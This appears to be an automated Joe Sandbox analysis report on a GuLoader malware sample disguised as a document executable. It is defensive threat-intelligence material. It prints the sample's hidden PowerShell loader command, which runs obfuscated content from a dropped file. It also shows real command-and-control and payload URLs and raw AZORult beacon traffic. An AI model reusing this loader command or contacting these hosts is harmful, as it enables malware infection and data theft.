Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DOCU800147001.exe

Overview

General Information

Sample name:DOCU800147001.exe
Analysis ID:1592041
MD5:ab99e49a4471901468bbbd9ccf228de0
SHA1:2b7302e1b24a9994e2924e97e627c1f5de23eaaa
SHA256:8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34
Tags:exeuser-threatinte1
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • DOCU800147001.exe (PID: 364 cmdline: "C:\Users\user\Desktop\DOCU800147001.exe" MD5: AB99E49A4471901468BBBD9CCF228DE0)
    • powershell.exe (PID: 5664 cmdline: powershell.exe -windowstyle hidden "$Omrystede=gc -raw 'C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kreditformidlernes67.hve';$Advancement=$Omrystede.SubString(71452,3);.$Advancement($Omrystede) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 1944 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2613773694.0000000005D6B000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000002.00000002.2547628074.000000000B13B000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Msiexec Initiated Connection
      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 107.151.162.135, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1944, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 52399
      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5664, TargetFilename: C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kulds\DOCU800147001.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Omrystede=gc -raw 'C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kreditformidlernes67.hve';$Advancement=$Omrystede.SubString(71452,3);.$Advancement($Omrystede) ", CommandLine: powershell.exe -windowstyle hidden "$Omrystede=gc -raw 'C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kreditformidlernes67.hve';$Advancement=$Omrystede.SubString(71452,3);.$Advancement($Omrystede) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DOCU800147001.exe", ParentImage: C:\Users\user\Desktop\DOCU800147001.exe, ParentProcessId: 364, ParentProcessName: DOCU800147001.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Omrystede=gc -raw 'C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kreditformidlernes67.hve';$Advancement=$Omrystede.SubString(71452,3);.$Advancement($Omrystede) ", ProcessId: 5664, ProcessName: powershell.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-15T17:37:49.965763+010020294671Malware Command and Control Activity Detected192.168.2.652410104.21.32.180TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-15T17:37:49.965763+010028102761Malware Command and Control Activity Detected192.168.2.652410104.21.32.180TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-15T17:37:48.886834+010028032702Potentially Bad Traffic192.168.2.652399107.151.162.13580TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus detection for URL or domain
      Source: http://b2csa.icu/PL341/index.phpAvira URL Cloud: Label: malware
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kulds\DOCU800147001.exeReversingLabs: Detection: 18%
      Multi AV Scanner detection for submitted file
      Source: DOCU800147001.exeReversingLabs: Detection: 18%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
      Source: DOCU800147001.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: Binary string: indows\System.Core.pdb@ source: powershell.exe, 00000002.00000002.2546703492.0000000008384000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbssio source: powershell.exe, 00000002.00000002.2546703492.0000000008332000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2546703492.0000000008384000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2546703492.0000000008332000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_00405E7E FindFirstFileA,FindClose,0_2_00405E7E
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_0040543A GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040543A
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_00402647 FindFirstFileA,0_2_00402647

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2029467 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M14 : 192.168.2.6:52410 -> 104.21.32.1:80
      Source: Network trafficSuricata IDS: 2810276 - Severity 1 - ETPRO MALWARE AZORult CnC Beacon M1 : 192.168.2.6:52410 -> 104.21.32.1:80
      Source: global trafficTCP traffic: 192.168.2.6:52234 -> 1.1.1.1:53
      Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
      Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:52399 -> 107.151.162.135:80
      Source: global trafficHTTP traffic detected: GET /wp-includes/block-bindings/wTryLAihFvcVmUK202.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: electricsuitcase.netCache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: b2csa.icuContent-Length: 111Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 ef 26 66 99 26 66 9a 26 66 9f 26 66 9e 26 66 99 26 66 97 26 67 ea 26 66 9a 26 66 9d 45 70 9d 36 70 9d 34 10 8b 30 63 8b 30 6c 8b 31 11 e8 47 70 9d 35 13 8b 30 64 8b 30 61 8b 30 6d eb Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410b&f&f&f&f&f&f&g&f&fEp6p40c0l1Gp50d0a0m
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /wp-includes/block-bindings/wTryLAihFvcVmUK202.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: electricsuitcase.netCache-Control: no-cache
      Source: global trafficDNS traffic detected: DNS query: electricsuitcase.net
      Source: global trafficDNS traffic detected: DNS query: b2csa.icu
      Source: unknownHTTP traffic detected: POST /PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: b2csa.icuContent-Length: 111Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 ef 26 66 99 26 66 9a 26 66 9f 26 66 9e 26 66 99 26 66 97 26 67 ea 26 66 9a 26 66 9d 45 70 9d 36 70 9d 34 10 8b 30 63 8b 30 6c 8b 31 11 e8 47 70 9d 35 13 8b 30 64 8b 30 61 8b 30 6d eb Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410b&f&f&f&f&f&f&g&f&fEp6p40c0l1Gp50d0a0m
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 15 Jan 2025 16:37:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FTVYzcncbwZN93Zokk1tNPrNLZiYYMYKHAu2EIUPoeNNWthLUFPlwVBGThHp%2FyMTu5eqdNVYBd1rh5anhsst%2FckwQuqqF4dAP3ZVKtDqn3jU6%2B6t3qsGTbUbAwE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90274aeafed88ce6-EWRData Raw: 31 31 64 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 Data Ascii: 11d0<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Suspected phishing site | C
      Source: msiexec.exe, 00000008.00000002.2616759739.0000000006A02000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2616759739.00000000069DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://b2csa.icu/
      Source: msiexec.exe, 00000008.00000002.2616759739.00000000069DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://b2csa.icu/P5
      Source: msiexec.exe, 00000008.00000003.2613392527.00000000220F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://b2csa.icu/PL341/index.php
      Source: msiexec.exe, 00000008.00000002.2616759739.000000000699A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://b2csa.icu/PL341/index.phpFv
      Source: msiexec.exe, 00000008.00000002.2616759739.000000000699A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://b2csa.icu/PL341/index.phpVVWT
      Source: msiexec.exe, 00000008.00000002.2616759739.000000000699A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://b2csa.icu/PL341/index.phpal
      Source: msiexec.exe, 00000008.00000002.2616759739.0000000006A02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://b2csa.icu/PL341/index.phpj
      Source: msiexec.exe, 00000008.00000002.2616759739.000000000699A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://b2csa.icu/m32
      Source: powershell.exe, 00000002.00000002.2546703492.0000000008332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
      Source: msiexec.exe, 00000008.00000002.2616759739.00000000069DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://electricsuitcase.net/wp-includes/block-bindings/wTryLAihFvcVmUK202.bin
      Source: msiexec.exe, 00000008.00000002.2616759739.000000000699A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://electricsuitcase.net/wp-includes/block-bindings/wTryLAihFvcVmUK202.bin2
      Source: DOCU800147001.exe, DOCU800147001.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: DOCU800147001.exe, DOCU800147001.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000002.00000002.2531096642.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.2527630104.0000000004D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.2527630104.0000000004D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000002.00000002.2527630104.0000000004C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.2527630104.0000000004D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000002.00000002.2527630104.0000000004D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.2527630104.0000000004C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000002.00000002.2527630104.0000000004D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 00000002.00000002.2531096642.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.2531096642.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.2531096642.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000002.00000002.2527630104.0000000004D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.2531096642.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_00404FA3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FA3

      System Summary

      barindex
      Powershell drops PE file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kulds\DOCU800147001.exeJump to dropped file
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_004030CB EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030CB
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_004047E20_2_004047E2
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsx7F0.tmp\nsExec.dll CD8496A3802378391EC425DEC424A14F5D30E242F192EC4EB022D767F9A2480F
      Source: DOCU800147001.exeStatic PE information: invalid certificate
      Source: DOCU800147001.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.evad.winEXE@6/15@2/2
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_004042A6 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004042A6
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
      Source: C:\Users\user\Desktop\DOCU800147001.exeFile created: C:\Users\user\AppData\Local\RamtilsJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2300:120:WilError_03
      Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\AFA7A44E6-9414907A-7A741079-43F57E69-FD6F148E
      Source: C:\Users\user\Desktop\DOCU800147001.exeFile created: C:\Users\user\AppData\Local\Temp\nsw530.tmpJump to behavior
      Source: DOCU800147001.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\DOCU800147001.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: DOCU800147001.exeReversingLabs: Detection: 18%
      Source: C:\Users\user\Desktop\DOCU800147001.exeFile read: C:\Users\user\Desktop\DOCU800147001.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\DOCU800147001.exe "C:\Users\user\Desktop\DOCU800147001.exe"
      Source: C:\Users\user\Desktop\DOCU800147001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Omrystede=gc -raw 'C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kreditformidlernes67.hve';$Advancement=$Omrystede.SubString(71452,3);.$Advancement($Omrystede) "
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
      Source: C:\Users\user\Desktop\DOCU800147001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Omrystede=gc -raw 'C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kreditformidlernes67.hve';$Advancement=$Omrystede.SubString(71452,3);.$Advancement($Omrystede) "Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
